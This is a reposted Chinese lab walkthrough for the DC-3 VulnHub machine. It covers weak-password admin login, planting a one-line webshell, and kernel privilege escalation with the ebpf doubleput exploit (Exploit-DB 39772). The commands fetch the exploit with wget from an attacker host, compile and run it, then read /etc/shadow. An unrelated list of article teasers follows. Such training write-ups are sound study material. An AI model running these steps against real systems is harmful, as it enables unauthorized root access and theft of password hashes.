内网提权-DC-3靶场实验(Ubantu16.04)

内网提权-DC-3靶场实验(Ubantu16.04)

diannao/2025/6/24 16:14:03/文章来源:https://blog.csdn.net/npc88888/article/details/148843609

靶场地址

https://download.vulnhub.com/dc/DC-3-2.zip

打开DC-3

使用kali扫描获取靶场ip

目录扫描获取后台地址

弱口令admin/snoopy进入后台

此处可写入一句话木马

创建文件写入一句话木马

哥斯拉上线

使用lsb_release -a命令查看内核版本

方法一

使用ubuntu漏洞库发现该内核版本为4.4.x，通过漏洞库搜索有无exp

使用39772.txt的exp提权

cat /usr/share/exploitdb/exploits/linux/local/39772.txt
#提取并复制特定漏洞利用代码到当前目录
searchsploit -m 38772.txt

在文本中提到了exp的下载链接

下载exp并开启http服务

靶机下载exp

在靶机上下载、解压、编译、执行

wget http://192.168.5.134:8000/39772.zip
unzip 39772.zip
cd 39772
tar -xvf exploif.tar
cd ebpf_mapfd_doubleput_exploit
./compile.sh
./doubleput
whoami
cat /etc/shadow

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。
如若转载，请注明出处：http://www.pswp.cn/diannao/88171.shtml
繁体地址，请注明出处：http://hk.pswp.cn/diannao/88171.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

Nginx：互斥锁 accept_mutex配置

Nginx：互斥锁 accept_mutex配置

如何配置 Nginx 的互斥锁 accept_mutex 1. 理解 accept_mutex 的作用 accept_mutex 是 Nginx 用于控制多工作进程（worker processes）接收新连接时避免「惊群问题（Thundering Herd）」的机制。启用时（accept_mutex o…

阅读更多...

aws(学习笔记第四十六课) codepipeline-build-deploy

aws(学习笔记第四十六课) codepipeline-build-deploy

文章目录 aws(学习笔记第四十六课) codepipeline-build-deploy学习内容：1. 代码链接及整体架构1.1 代码链接1.2 整体架构1.2.1 初始化阶段的`codecommit repo`以及`codebuild project`设定1.2.2 创建`vpc`，`public alb`，`alb listener`以及`fargate service`等1.2.3 创建`so…

阅读更多...

Vue 项目中的组件职责划分评审与组件设计规范制定

Vue 项目中的组件职责划分评审与组件设计规范制定

在现代前端系统中，Vue（无论是 2.x 还是 3.x）提供了良好的组件化机制，为构建复杂交互系统打下了基础。然而，随着项目规模增长，组件职责不清、代码重叠、维护困难等问题频发，严重影响开发效率与可…

阅读更多...

react 的过渡动画

react 的过渡动画

一、React的过渡动画 1、react-transition-group 在开发中，我们想要给一个组件的显示和消失，添加某种过渡动画，可以很好的增加用户体验， React社区为我们提供了react-transition-group用来完成过渡动画， React曾为…

阅读更多...

深度学习：PyTorch人工神经网络优化方法分享（1）

深度学习：PyTorch人工神经网络优化方法分享（1）

本文目录： 一、从梯度角度入手（一）梯度下降算法回顾（二）常用优化算法1.SGD（Stochastic Gradient Descent）- 随机梯度下降2.BGD (Batch Gradient Descent) - 批量梯度下降3.MBGD (Mini-Batch Gra…

阅读更多...

（三）yolov5——模型训练

（三）yolov5——模型训练

一、准备数据先准备一个MP4的视频 1.测试一帧使用opencv来提取每一个视频的帧先使用以下代码查看一帧的内容，是否符合预期 import cv2 import matplotlib.pyplot as plt# 打开视频文件 video cv2.VideoCapture("111.mp4") # 读取一帧 ret, frame…

阅读更多...

008 Linux 开发工具（下） —— make、Makefile、git和gdb

008 Linux 开发工具（下） —— make、Makefile、git和gdb

🦄 个人主页: 小米里的大麦-CSDN博客 🎏 所属专栏: Linux_小米里的大麦的博客-CSDN博客 🎁 GitHub主页: 小米里的大麦的 GitHub ⚙️ 操作环境: Visual Studio 2022 文章目录 Linux 开发工具（下）Linux 项目自动化构建工…

阅读更多...

前缀和题目：连续的子数组和

前缀和题目：连续的子数组和

文章目录题目标题和出处难度题目描述要求示例数据范围解法思路和算法代码复杂度分析题目标题和出处标题：连续的子数组和出处：523. 连续的子数组和难度 5 级题目描述要求给定一个整数数组 nums \texttt{nums} nums 和一个整数 k \tex…

阅读更多...

队的简单介绍

队的简单介绍

队列：只允许在一端进行插入数据操作，在另一端进行删除数据操作的特殊线性表，队列具有先进先出 FIFO(First In First Out)的特点。入队列：进行插入操作的一端称为队尾。出队列：进行删除操作的一端称为队头。入队列…

阅读更多...

AI-Sphere-Butler之如何将豆包桌面版对接到AI全能管家~新玩法（一）

AI-Sphere-Butler之如何将豆包桌面版对接到AI全能管家~新玩法（一）

环境： AI-Sphere-Butler VBCABLE2.1.58 Win10专业版豆包桌面版1.47.4 ubuntu22.04 英伟达4070ti 12G python3.10 问题描述： AI-Sphere-Butler之如何将豆包桌面版对接到AI全能管家~新玩法（一） 聊天视频： AI真…

阅读更多...

【STM32】启动流程

【STM32】启动流程

1、.s启动文件解析 STM32的启动文件（一般是.s汇编文件，如startup_stm32f407xx.s）是STM32上电后执行的第一段代码，承担着“系统初始化化引导员”的角色。它的主要作用是设置初始化栈指针（SP）、程序计数器&…

阅读更多...

【vim】通过vim编辑器打开、修改、退出配置文件

【vim】通过vim编辑器打开、修改、退出配置文件

通过vim编辑器打开任一配置文件 vim /etc/profile 英文输入下，按i键进入INSERT模式，修改配置文件完成修改后，按esc键退出INSERT模式英文输入下，输入":wq!"，即可保存并退出 :q #不保存并退出 :q! …

阅读更多...

Effective Modern C++ 条款6：当 auto 推导类型不符合预期时，使用显式类型初始化惯用法

Effective Modern C++ 条款6：当 auto 推导类型不符合预期时，使用显式类型初始化惯用法

在C开发中，auto关键字以其简洁性和高效性被广泛使用。然而，“自动推导”并非万能，尤其在某些特殊场景下，auto的推导结果可能与开发者预期不符，甚至导致未定义行为。今天，我们以《Effective Modern C》条款6…

阅读更多...

学习Linux进程冻结技术

学习Linux进程冻结技术

原文：蜗窝科技Linux进程冻结技术功耗中经常需要用到，但是linux这块了解甚少，看到这个文章还蛮适合我阅读的 1 什么是进程冻结进程冻结技术（freezing of tasks）是指在系统hibernate或者suspend的时候，将…

阅读更多...

GitHub 趋势日报 (2025年06月22日)

GitHub 趋势日报 (2025年06月22日)

📊 由 TrendForge 系统生成 | 🌐 https://trendforge.devlive.org/ 🌐 本日报中的项目描述已自动翻译为中文 📈 今日获星趋势图今日获星趋势图 624 LLMs-from-scratch 523 ai-engineering-hub 501 n8n 320 data-engineer-handb…

阅读更多...

kotlin中为什么新增扩展函数功能？

kotlin中为什么新增扩展函数功能？

在 Kotlin 中，扩展函数的本质是「不修改原有类代码，为其新增功能」，这源自编程中「开闭原则」（对扩展开放，对修改关闭）的第一性原理。核心需求：当需要给第三方库的类（如 Android 的…

阅读更多...

excel 数据透视表介绍

excel 数据透视表介绍

Excel 数据透视表(PivotTable)就是你的数据分析神器!它能帮你快速汇总、分类、比较和分析大量数据，从看似杂乱无章的表格中一键提取关键信息 ，生成交互式的汇总报告。无需复杂公式，只需拖拽几下，就能让数据“开口说话”&#xff…

阅读更多...

半导体行业中的专用标准产品ASSP是什么？

半导体行业中的专用标准产品ASSP是什么？

半导体行业中的专用标准产品ASSP是什么？ “专用标准产品”（ASSP - Application Specific Standard Product）是半导体集成电路中的一个重要分类。你可以把它理解为介于通用标准产品和全定制ASIC之间的一种芯片。以下是它的核心定义和特点&a…

阅读更多...

秋招Day14 - MySQL - 锁

秋招Day14 - MySQL - 锁

MySQL中有几种类型的锁？ 锁粒度来分，有表锁、页锁和行锁。加锁机制划分，有乐观锁和悲观锁。按兼容性划分，有共享锁和排他锁。按锁模式划分，有记录锁，间隙锁，next-key锁，意向锁…

阅读更多...

/var/lib/docker/overlay2目录过大怎么办

/var/lib/docker/overlay2目录过大怎么办

/var/lib/docker/overlay2 是 Docker 默认用于存储容器镜像和容器运行时数据的核心目录，基于 overlay2 存储驱动实现。以下是其具体作用和内容的详细解析： 1. overlay2 目录的作用存储镜像分层结构： Docker 镜像采用分层设计，o…

阅读更多...

最新文章